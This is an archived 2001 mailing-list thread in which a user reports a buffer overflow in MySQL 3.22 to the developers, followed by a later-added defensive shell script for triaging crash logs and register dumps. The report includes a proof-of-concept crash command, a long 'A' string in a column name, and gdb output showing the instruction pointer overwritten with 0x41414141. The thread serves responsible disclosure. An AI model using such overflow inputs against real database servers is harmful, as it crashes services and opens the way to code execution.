> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
> 
> 
> On the other terminal:
> 
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> 
> 
> On the first terminal i got:
> 
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
> g "$@" >>$err_log 2>&1
> 
> Number of processes running now: 0
> mysqld restarted on  Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> 
> 
> gdb shows the following:
> 
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
> 
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax    0x1         1
> ecx    0x68        104
> edx    0x8166947   135686471
> ebx    0x41414141  1094795585
> esp    0xbf5ff408  0xbf5ff408
> ebp    0x41414141  0x41414141
> esi    0x41414141  1094795585
> edi    0x0         0
> eip    0x41414141  0x41414141
> eflags 0x10246     66118
> cs     0x23        35
> ss     0x2b        43
> ds     0x2b        43
> es     0x2b        43
> fs     0x0         0
> gs     0x0         0
> (gdb)
> 
> 
> Looks like a typical overflow to me.
> Please reply asap, at least to tell me I'm not seeing things. :-)
> 
> Best regards,
> 
> Joao Gouveia aka Tharbad.
> 
> [EMAIL PROTECTED]
> 
 
Regards,
Sergei

--
MySQL Development Team
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /   Sergei Golubchik <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__  MySQL AB, http://www.mysql.com/
/_/  /_/\_, /___/\___\_\___/  Osnabrueck, Germany
   <___/





mysql security issue, overflow

2001-01-12 Thread João Gouveia

Hi,

I believe I've found a problem in MySQL. Here are some tests I've made on
3.22.27 x86 (also tested on v3.22.32, the latest stable, although I didn't
debug it, just tested to see if it crashes).

On one terminal:

spike:/var/mysql # /sbin/init.d/mysql start
Starting service MySQL.
Starting mysqld daemon with databases from /var/mysql
done
spike:/var/mysql #


On the other terminal:

jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
Enter password:
(hanged..^C)


On the first terminal i got:

spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
nohup
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1

Number of processes running now: 0
mysqld restarted on  Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended


gdb shows the following:

(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax    0x1         1
ecx    0x68        104
edx    0x8166947   135686471
ebx    0x41414141  1094795585
esp    0xbf5ff408  0xbf5ff408
ebp    0x41414141  0x41414141
esi    0x41414141  1094795585
edi    0x0         0
eip    0x41414141  0x41414141
eflags 0x10246     66118
cs     0x23        35
ss     0x2b        43
ds     0x2b        43
es     0x2b        43
fs     0x0         0
gs     0x0         0
(gdb)


Looks like a typical overflow to me.
Please reply asap, at least to tell me I'm not seeing things. :-)

Best regards,

Joao Gouveia aka Tharbad.

[EMAIL PROTECTED]
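An added example (not code from the report) of the triage a responder does with the two artifacts João posted: the safe_mysqld restart messages and the gdb register dump. Both samples below are constructed to match the report's format; the register values are the ones quoted above, re-spaced, and the second restart line is invented to show a crash loop. The reasoning it encodes is the one in the report's last line: a register holding a value made of the request's own bytes (0x41414141 is "AAAA") shows that input reached the saved registers, which is what separates a memory-safety bug from an ordinary crash and turns a segfault into a security incident rather than a stability ticket. Function names are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the report. Defender-side triage over a
# safe_mysqld log excerpt and a gdb register dump. Both samples are
# constructed to match the report's format (second restart line invented).

LOG_SAMPLE='Number of processes running now: 0
mysqld restarted on  Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended
Number of processes running now: 0
mysqld restarted on  Fri Jan 12 07:12:31 WET 2001
mysqld daemon ended'

REG_SAMPLE='eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118'

# restart_count LOG: how many times safe_mysqld restarted the daemon.
# Repeated restarts minutes apart are the log signature of a crash loop
# and the first thing to alert on.
restart_count() {
    printf '%s\n' "$1" | grep -c '^mysqld restarted on'
}

# tainted_registers DUMP [MARKER]: names of the registers whose hex value
# equals MARKER (default 0x41414141), space-separated on one line.
tainted_registers() {
    marker="${2:-0x41414141}"
    printf '%s\n' "$1" | awk -v m="$marker" '
        $2 == m { if (r != "") r = r " "; r = r $1 }
        END { print r }'
}

# pc_is_tainted DUMP [MARKER]: 0 (true) when eip itself holds MARKER,
# i.e. execution was redirected to an address built from input bytes.
pc_is_tainted() {
    case " $(tainted_registers "$1" "$2") " in
        *" eip "*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Demo run over the constructed samples.
echo "restarts: $(restart_count "$LOG_SAMPLE")"
echo "registers holding 0x41414141: $(tainted_registers "$REG_SAMPLE")"
if pc_is_tainted "$REG_SAMPLE"; then
    echo "verdict: instruction pointer controlled by input, treat as security bug"
fi
```

The marker is a parameter because the bytes that reach the registers depend on what the crashing request contained; the dump, the restart count and the matching query from the general log are what goes into the report to the vendor, together with the version numbers, as Sergei's reply asks for.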


